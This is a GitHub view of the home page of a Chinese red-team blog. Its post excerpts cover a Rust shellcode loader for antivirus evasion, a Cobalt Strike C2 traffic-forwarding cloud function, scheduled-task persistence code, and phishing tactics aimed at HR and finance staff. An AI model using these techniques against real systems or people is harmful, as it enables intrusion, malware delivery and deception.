-
Notifications
You must be signed in to change notification settings - Fork 3
/
index.html
365 lines (297 loc) · 38.4 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>Hyyrent blog</title><meta name="author" content="Hyyrent"><meta name="copyright" content="Hyyrent"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta property="og:type" content="website">
<meta property="og:title" content="Hyyrent blog">
<meta property="og:url" content="https://pizz33.github.io/index.html">
<meta property="og:site_name" content="Hyyrent blog">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pizz33.github.io/img/touxiang.png">
<meta property="article:author" content="Hyyrent">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pizz33.github.io/img/touxiang.png"><link rel="shortcut icon" href="/img/ico.jpg"><link rel="canonical" href="https://pizz33.github.io/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
root: '/',
algolia: undefined,
localSearch: undefined,
translate: {"defaultEncoding":1,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
noticeOutdate: undefined,
highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
copy: {
success: '复制成功',
error: '复制错误',
noSupport: '浏览器不支持'
},
relativeDate: {
homepage: false,
post: false
},
runtime: '天',
date_suffix: {
just: '刚刚',
min: '分钟前',
hour: '小时前',
day: '天前',
month: '个月前'
},
copyright: undefined,
lightbox: 'fancybox',
Snackbar: undefined,
source: {
justifiedGallery: {
js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.js',
css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.css'
}
},
isPhotoFigcaption: false,
islazyload: false,
isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
title: 'Hyyrent blog',
isPost: false,
isHome: true,
isHighlightShrink: false,
isToc: false,
postUpdate: '2024-06-04 11:41:51'
}</script><noscript><style type="text/css">
#nav {
opacity: 1
}
.justified-gallery img {
opacity: 1
}
#recent-posts time,
#post-meta time {
display: inline !important
}
</style></noscript><script>(win=>{
win.saveToLocal = {
set: function setWithExpiry(key, value, ttl) {
if (ttl === 0) return
const now = new Date()
const expiryDay = ttl * 86400000
const item = {
value: value,
expiry: now.getTime() + expiryDay,
}
localStorage.setItem(key, JSON.stringify(item))
},
get: function getWithExpiry(key) {
const itemStr = localStorage.getItem(key)
if (!itemStr) {
return undefined
}
const item = JSON.parse(itemStr)
const now = new Date()
if (now.getTime() > item.expiry) {
localStorage.removeItem(key)
return undefined
}
return item.value
}
}
win.getScript = url => new Promise((resolve, reject) => {
const script = document.createElement('script')
script.src = url
script.async = true
script.onerror = reject
script.onload = script.onreadystatechange = function() {
const loadState = this.readyState
if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
script.onload = script.onreadystatechange = null
resolve()
}
document.head.appendChild(script)
})
win.activateDarkMode = function () {
document.documentElement.setAttribute('data-theme', 'dark')
if (document.querySelector('meta[name="theme-color"]') !== null) {
document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
}
}
win.activateLightMode = function () {
document.documentElement.setAttribute('data-theme', 'light')
if (document.querySelector('meta[name="theme-color"]') !== null) {
document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
}
}
const t = saveToLocal.get('theme')
const now = new Date()
const hour = now.getHours()
const isNight = hour <= 6 || hour >= 18
if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
else if (t === 'light') activateLightMode()
else activateDarkMode()
const asideStatus = saveToLocal.get('aside-status')
if (asideStatus !== undefined) {
if (asideStatus === 'hide') {
document.documentElement.classList.add('hide-aside')
} else {
document.documentElement.classList.remove('hide-aside')
}
}
const detectApple = () => {
if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
document.documentElement.classList.add('apple')
}
}
detectApple()
})(window)</script><meta name="generator" content="Hexo 6.1.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/touxiang.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">60</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">19</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 文章</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="page" id="body-wrap"><header class="full_page" id="page-header" style="background-image: url('/img/bg.jpg')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Hyyrent blog</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 文章</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="site-info"><h1 id="site-title">Hyyrent blog</h1><div id="site-subtitle"><span id="subtitle"></span></div><div id="site_social_icons"><a class="social-icon" href="https://github.com/Pizz33/" target="_blank" title="Github"><i class="fab fa-github"></i></a></div></div><div id="scroll-down"><i class="fas fa-angle-down scroll-down-effects"></i></div></header><main class="layout" id="content-inner"><div class="recent-posts" id="recent-posts"><div class="recent-post-item"><div class="post_cover left"><a href="/posts/4e137f0df999/" title="工具开发-Rustloader免杀生成器"><img class="post_bg" src="/img/10.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="工具开发-Rustloader免杀生成器"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/4e137f0df999/" title="工具开发-Rustloader免杀生成器">工具开发-Rustloader免杀生成器</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2024-06-04T03:12:09.000Z" title="发表于 2024-06-04 11:12:09">2024-06-04</time></span></div><div class="content">Rustloader免杀生成器开发背景由于近年来go用来做免杀器越来越普遍,导致杀软对go编译程序静态查杀力度增大,因此转型投入rust的怀抱
说实话,rust的语法是真难懂,边改边查参考github代码总算是捏出来了
加载方式
使用LoadLibraryA和GetProcAddress从ntdll获取NtQueueApcThreadEx函数。
使用VirtualAlloc分配远程内存。
使用STD::PTR::COPY将SHELLCODE复制到分配的内存。
使用VirtualProtect将内存权限更改为可执行文件。
使用GetCurrentThread获取当前线程句柄。
使用NtQueueApcThreadEx执行SHELLCODE
使用方式和我之前开发的go千机一样,一样是一键化生成,别问,问就是为了最大化的简便,目录结构如下
解压打开文件目录,把 beacon_x64.bin 放置在当前目录下,点击 一键生成.bat
输出免杀文件在 output 文件夹下,随机六位数命名
捆绑文件选择捆绑文件存放在 bundle 文件夹下,默认放置打开损坏文档
如果不需要捆绑文件,把ma ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/89e60a4b8738/" title="溯源反制-简易蜜罐设计流程"><img class="post_bg" src="/img/13.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="溯源反制-简易蜜罐设计流程"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/89e60a4b8738/" title="溯源反制-简易蜜罐设计流程">溯源反制-简易蜜罐设计流程</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2024-05-17T03:36:13.000Z" title="发表于 2024-05-17 11:36:13">2024-05-17</time></span></div><div class="content">简易蜜罐设计流程设计要点部署方式尽量简便,适配环境兼容性高,与客户实际网络环境单独隔离,防止作为跳板进行横向
水坑攻击
部署仿真系统系统攻击者进行攻击
仿真系统需提供接口供攻击队扫描识别漏洞
通过js水坑触发安全控件弹窗诱使攻击者安装
不安装则会重定向到首页
代码实现
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152from flask import Flask, send_from_directory, request, make_responseapp = Flask(__name__, static_folder='static')@app.route('/')def index(): return send_from_directory(app.static_folder, '1.html')@app.route('/test.exe')d ...</div></div></div><div class="recent-post-item"><div class="post_cover left"><a href="/posts/4cd847860269/" title="工具开发-go实现屏幕监控截图"><img class="post_bg" src="/img/13.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="工具开发-go实现屏幕监控截图"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/4cd847860269/" title="工具开发-go实现屏幕监控截图">工具开发-go实现屏幕监控截图</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2024-05-16T09:44:58.000Z" title="发表于 2024-05-16 17:44:58">2024-05-16</time></span></div><div class="content">开发背景今天好兄弟打项目时候碰到这么一个情况,目标机器访问内网应用需要连接VPN,会切断外网连接,导致beacon无法及时执行回显命令
为了证明能够突破隔离,需要目标机器访问内网应用的截图,于是简单写了下,当作记录
代码实现go build -trimpath -ldflags="-s -w -H windowsgui" main.go
为了避免后续beacon掉线导致进程一直执行,需要设置生成次数限制
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455package mainimport ( "fmt" "image/png" "os" "path/filepath" "time" "github.com/vova616/screenshot")func main() { //路径 s ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/5c2ada4745d3/" title="钓鱼技巧-FTP高级LNK钓鱼技术"><img class="post_bg" src="/img/4.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="钓鱼技巧-FTP高级LNK钓鱼技术"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/5c2ada4745d3/" title="钓鱼技巧-FTP高级LNK钓鱼技术">钓鱼技巧-FTP高级LNK钓鱼技术</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2024-05-10T10:11:03.000Z" title="发表于 2024-05-10 18:11:03">2024-05-10</time></span></div><div class="content">
573c9136887dd3c10ac91ab197c13a96b784871495672aa585ffee31d6f40e013c53864c5823bcd71b7854b059b5710564c158aae16c011554207d7400c1120040828bd4c48457f924171f28f3e9badf31c0c9ec90f9e80610ee88e16dd4a50a235b1f1fa0378a3f639256df0d07d9c3438c3ae28f23791756489eedeb39a576173acce25893cdd702b732c21c49943146e0154069e7a260bf6d023d59a17b77c35c7deb4a4885c78c03c1772544628bd5cecdd48a467465a2257796587dd4b768fcad3c03db07e03a11a960b5085f9a56a580dd066e010098e998ea909c1206bb942303f670dbc4a64986e04981b34dfd13c77ba30bc7565 ...</div></div></div><div class="recent-post-item"><div class="post_cover left"><a href="/posts/8201ba3f7483/" title="红队技术-攻防场景下360对抗专题"><img class="post_bg" src="/img/2.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红队技术-攻防场景下360对抗专题"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/8201ba3f7483/" title="红队技术-攻防场景下360对抗专题">红队技术-攻防场景下360对抗专题</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2024-03-27T07:57:34.000Z" title="发表于 2024-03-27 15:57:34">2024-03-27</time></span></div><div class="content">
cbd6f2c07a534cf88d3655f88e3f0065671c1e8f29ae7ff190de02afd711ca5cae147bb433f7779110a70e5dd31a1ce0ce9d5784827302c1ce9237a967ff9cff52acfaf9c668748a1f517ca01f1afd72814d958d3884685eea4696ea53d977c3c60f4bc1f6d5e1390b284a12d8a4cd503969c3f2522611afe3b2786375097ccf08f356c3af922b2e1c77b2b58bc1fc76af3a9c7a799d66b0e564017ba6def25ebc166ec322812262cf2a58b7c694b4157ba8487241b9363d19c025b32c957011f5aa0ce7f64d97cb64df4a9584cd9341af7234832e9ebdea8d6c194e74ecd3a5065bf871453387784377923f00ee08f6855af17a9f7896318 ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/e251af601155/" title="红队技术-cobaltstrike流量隐藏"><img class="post_bg" src="/img/15.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红队技术-cobaltstrike流量隐藏"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/e251af601155/" title="红队技术-cobaltstrike流量隐藏">红队技术-cobaltstrike流量隐藏</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2024-01-19T07:23:38.000Z" title="发表于 2024-01-19 15:23:38">2024-01-19</time></span></div><div class="content">云函数新建一个云函数,在代码位置进行修改
首先导入 yisiwei.zip 的云函数包
12345678910111213141516171819# -*- coding: utf8 -*-import json, requests, base64def main_handler(event, context): C2 = 'https://49.xx.xx.xx' # 这里可以使用 HTTP、HTTPS~下角标~ path = event['path'] headers = event['headers'] print(event) if event['httpMethod'] == 'GET': resp = requests.get(C2 + path, headers=headers, verify=False) else: resp = requests.post(C2 + path, data=event[ ...</div></div></div><div class="recent-post-item"><div class="post_cover left"><a href="/posts/6362e2e0ec1e/" title="红队技术-外网打点实战案例分享"><img class="post_bg" src="/img/4.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红队技术-外网打点实战案例分享"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/6362e2e0ec1e/" title="红队技术-外网打点实战案例分享">红队技术-外网打点实战案例分享</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2023-12-15T08:56:08.000Z" title="发表于 2023-12-15 16:56:08">2023-12-15</time></span></div><div class="content">红队外网打点实战案例分享从最基础的登录框突破登录框作为hw出现场次最多的角色,也是最容易出洞的,下面介绍一些自己常用的测试方法
登录爆破小技巧
像这种系统的爆破我们有两种解决方法:
分析前端加密算法,写脚本模拟对密码进行加密
固定密码为123456 000000 使用常见的用户名作为字典进行爆破
两种方法各有优劣,我更倾向于第二种,在比赛打点效率会更高,分析加密算法更适用于红队检测项目
使用爆破的账号密码登入后台,便可以继续寻找后台上传点
看到图片类型这里限制上传的文件格式
直接添加 aspx 文件格式类型
成功getshell
修改返回数据包参数进入后台有些时候网站登录状态是根据前端判断的,这时候我们就可以直接修改返回包进行绕过
前端判断登录逻辑根据返回包的ret值决定,当返回值为1则成功登录
成功进入后台
插件探测常见sql注入和log4j漏洞sql注入插件推荐 https://github.com/smxiazi/xia_sql
基本原理是通过发送多个数据包,根据返回数据长度判断是否存在注入
除了被动扫描以外,我们还可以通过手动添加单引号、双引号去查看返回包 ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/53de6033c423/" title="红队技术-钓鱼手法及木马免杀技巧"><img class="post_bg" src="/img/13.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红队技术-钓鱼手法及木马免杀技巧"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/53de6033c423/" title="红队技术-钓鱼手法及木马免杀技巧">红队技术-钓鱼手法及木马免杀技巧</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2023-11-15T03:51:54.000Z" title="发表于 2023-11-15 11:51:54">2023-11-15</time></span></div><div class="content">简述钓鱼是攻防对抗中一种常用的手段,攻击者通常伪装成可信任的实体,例如合法的机构、公司或个人,以引诱受害者揭示敏感信息或执行恶意操作,能快速地撕破目标的伤口进行深入利用,快速进内网进行刷分,投递木马同时需要考虑逃避杀毒软件检测,本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开
信息搜集大批量邮箱搜集大批量邮箱搜集可通过
https://app.snov.io/
http://www.skymem.info/
搜索引擎但一般来说,企业邮箱都存在邮服网关,邮件很难投递,所以我们要选择私人邮箱或不被邮服拦截的邮箱
比如说 xx举报,xx招聘面对大众的邮箱,相关语法:
12345site:"xxx.com" 举报site:"xxx.com" 招聘xx公司举报 @126.comxx公司招聘 @qq.com
钓鱼手法社工钓鱼1、首先是目标选择,目标群体:hr、经理、财务 等安全意识薄弱的人优先选择,避开信息安全部
2、选择目标公司分部进行钓鱼成功率较高,前期提前想好话术和应变对策,避免被识破
2、社牛的师傅可以尝试电话钓鱼,获取信任再添加微信发送木 ...</div></div></div><div class="recent-post-item"><div class="post_cover left"><a href="/posts/47466d44bcd2/" title="红队技术-上线木马自动维权"><img class="post_bg" src="/img/1.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红队技术-上线木马自动维权"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/47466d44bcd2/" title="红队技术-上线木马自动维权">红队技术-上线木马自动维权</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2023-10-30T11:32:25.000Z" title="发表于 2023-10-30 19:32:25">2023-10-30</time></span></div><div class="content">在攻防中,上线机器总是需要手动进行维权,太过于麻烦,何不直接上线即维权呢,直接放核心代码,当做个记录
https://github.com/capnspacehook/taskmaster
12345678910111213141516171819202122232425262728293031323334353637383940package mainimport ( "os" "github.com/capnspacehook/taskmaster")func runWinTask(path string) { // 创建初始化计划任务 taskService, _ := taskmaster.Connect() defer taskService.Disconnect() // 定义新的计划任务 newTaskDef := taskService.NewTaskDefinition() // 添加执行程序的路径 newTaskDef.AddAction(taskmaster.ExecAction{ Path: path ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/20dde3b26f4a/" title="红队技术-社工钓鱼细节技巧"><img class="post_bg" src="/img/5.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红队技术-社工钓鱼细节技巧"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/20dde3b26f4a/" title="红队技术-社工钓鱼细节技巧">红队技术-社工钓鱼细节技巧</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2023-09-26T07:40:04.000Z" title="发表于 2023-09-26 15:40:04">2023-09-26</time></span></div><div class="content">社工钓鱼细节技巧钓鱼对象1、hr、经理、财务 等安全意识薄弱的人,避开信息安全部
如何搜集邮箱信息?
https://app.snov.io/
但一般来说,企业邮箱都存在邮服网关,邮件很难投递,所以我们要选择一些针对公开群众的邮箱
比如说 xxx举报,xxx信息反馈面对大众的邮箱,如何搜集呢
钓鱼手法1、群发(不推荐,易被发现或被邮服拦截)
2、添加微信发送钓鱼木马(话术获取信任)
3、扫码活动钓账号
邮件投递木马1、木马需要打压缩,添加密码并隐藏内容,防止直接在压缩包内打开
2、后缀可选择其他非exe仍可执行的,如scr、com等
3、如果知道对方杀软没有360这种,可通过空格和长文件命名
免杀及捆绑文件自写工具介绍
杀软特性
杀软类型
免杀绕过技巧
火绒
编译参数限制多,对hash和字符串特征进行识别,静态能过动态基本不查杀,对很多go库调用报毒
360
单360查杀力不高,装了杀毒后直接儿子变爸爸,查杀力大大提升,对于简单的加密识别度较高,容易上线后云查杀过一会掉线,推荐使用分离加载方式,并使用反沙箱的代码延长马子时间,对资源查杀力度强,会报qvm
3 ...</div></div></div><nav id="pagination"><div class="pagination"><span class="page-number current">1</span><a class="page-number" href="/page/2/#content-inner">2</a><span class="space">…</span><a class="page-number" href="/page/6/#content-inner">6</a><a class="extend next" rel="next" href="/page/2/#content-inner"><i class="fas fa-chevron-right fa-fw"></i></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/touxiang.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">Hyyrent</div><div class="author-info__description"></div></div><div class="card-info-data is-center"><div class="card-info-data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">60</div></a></div><div class="card-info-data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">19</div></a></div><div class="card-info-data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div></div><a id="card-info-btn" href="https://pizz33.github.io/"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/Pizz33/" target="_blank" title="Github"><i class="fab fa-github"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/posts/4e137f0df999/" title="工具开发-Rustloader免杀生成器"><img src="/img/10.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="工具开发-Rustloader免杀生成器"/></a><div class="content"><a class="title" href="/posts/4e137f0df999/" title="工具开发-Rustloader免杀生成器">工具开发-Rustloader免杀生成器</a><time datetime="2024-06-04T03:12:09.000Z" title="发表于 2024-06-04 11:12:09">2024-06-04</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/89e60a4b8738/" title="溯源反制-简易蜜罐设计流程"><img src="/img/13.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="溯源反制-简易蜜罐设计流程"/></a><div class="content"><a class="title" href="/posts/89e60a4b8738/" title="溯源反制-简易蜜罐设计流程">溯源反制-简易蜜罐设计流程</a><time datetime="2024-05-17T03:36:13.000Z" title="发表于 2024-05-17 11:36:13">2024-05-17</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/4cd847860269/" title="工具开发-go实现屏幕监控截图"><img src="/img/13.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="工具开发-go实现屏幕监控截图"/></a><div class="content"><a class="title" href="/posts/4cd847860269/" title="工具开发-go实现屏幕监控截图">工具开发-go实现屏幕监控截图</a><time datetime="2024-05-16T09:44:58.000Z" title="发表于 2024-05-16 17:44:58">2024-05-16</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/5c2ada4745d3/" title="钓鱼技巧-FTP高级LNK钓鱼技术"><img src="/img/4.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="钓鱼技巧-FTP高级LNK钓鱼技术"/></a><div class="content"><a class="title" href="/posts/5c2ada4745d3/" title="钓鱼技巧-FTP高级LNK钓鱼技术">钓鱼技巧-FTP高级LNK钓鱼技术</a><time datetime="2024-05-10T10:11:03.000Z" title="发表于 2024-05-10 18:11:03">2024-05-10</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/8201ba3f7483/" title="红队技术-攻防场景下360对抗专题"><img src="/img/2.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红队技术-攻防场景下360对抗专题"/></a><div class="content"><a class="title" href="/posts/8201ba3f7483/" title="红队技术-攻防场景下360对抗专题">红队技术-攻防场景下360对抗专题</a><time datetime="2024-03-27T07:57:34.000Z" title="发表于 2024-03-27 15:57:34">2024-03-27</time></div></div></div></div><div class="card-widget card-tags"><div class="item-headline"><i class="fas fa-tags"></i><span>标签</span></div><div class="card-tag-cloud"><a href="/tags/Java%E5%AD%A6%E4%B9%A0/" style="font-size: 1.17em; color: #999c9f">Java学习</a> <a href="/tags/%E4%BA%91%E5%AE%89%E5%85%A8/" style="font-size: 1.1em; color: #999">云安全</a> <a href="/tags/%E5%85%8D%E6%9D%80%E6%8A%80%E6%9C%AF/" style="font-size: 1.23em; color: #999ea6">免杀技术</a> <a href="/tags/%E5%B7%A5%E5%85%B7%E5%BC%80%E5%8F%91/" style="font-size: 1.3em; color: #99a1ac">工具开发</a> <a href="/tags/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/" style="font-size: 1.17em; color: #999c9f">应急响应</a> <a href="/tags/%E6%8A%80%E6%9C%AF%E7%A0%94%E7%A9%B6/" style="font-size: 1.1em; color: #999">技术研究</a> <a href="/tags/%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83/" style="font-size: 1.23em; color: #999ea6">攻防演练</a> <a href="/tags/%E6%97%A5%E5%B8%B8%E6%8A%80%E5%B7%A7/" style="font-size: 1.23em; color: #999ea6">日常技巧</a> <a href="/tags/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" style="font-size: 1.17em; color: #999c9f">权限维持</a> <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" style="font-size: 1.37em; color: #99a4b2">渗透测试</a> <a href="/tags/%E6%BA%AF%E6%BA%90%E5%8F%8D%E5%88%B6/" style="font-size: 1.17em; color: #999c9f">溯源反制</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/" style="font-size: 1.1em; color: #999">漏洞利用</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" style="font-size: 1.43em; color: #99a6b9">漏洞复现</a> <a href="/tags/%E7%97%95%E8%BF%B9%E6%B8%85%E9%99%A4/" style="font-size: 1.1em; color: #999">痕迹清除</a> <a href="/tags/%E7%A7%BB%E5%8A%A8%E5%AE%89%E5%85%A8/" style="font-size: 1.1em; color: #999">移动安全</a> <a href="/tags/%E7%BA%A2%E9%98%9F%E6%8A%80%E6%9C%AF/" style="font-size: 1.5em; color: #99a9bf">红队技术</a> <a href="/tags/%E8%BD%AF%E4%BB%B6%E7%A0%B4%E8%A7%A3/" style="font-size: 1.1em; color: #999">软件破解</a> <a href="/tags/%E9%92%93%E9%B1%BC%E6%8A%80%E5%B7%A7/" style="font-size: 1.17em; color: #999c9f">钓鱼技巧</a> <a href="/tags/%E9%9D%B6%E5%9C%BA%E5%AD%A6%E4%B9%A0/" style="font-size: 1.23em; color: #999ea6">靶场学习</a></div></div><div class="card-widget card-archives"><div class="item-headline"><i class="fas fa-archive"></i><span>归档</span><a class="card-more-btn" href="/archives/" title="查看更多">
<i class="fas fa-angle-right"></i></a></div><ul class="card-archive-list"><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/06/"><span class="card-archive-list-date">六月 2024</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/05/"><span class="card-archive-list-date">五月 2024</span><span class="card-archive-list-count">3</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/03/"><span class="card-archive-list-date">三月 2024</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/01/"><span class="card-archive-list-date">一月 2024</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/12/"><span class="card-archive-list-date">十二月 2023</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/11/"><span class="card-archive-list-date">十一月 2023</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/10/"><span class="card-archive-list-date">十月 2023</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/09/"><span class="card-archive-list-date">九月 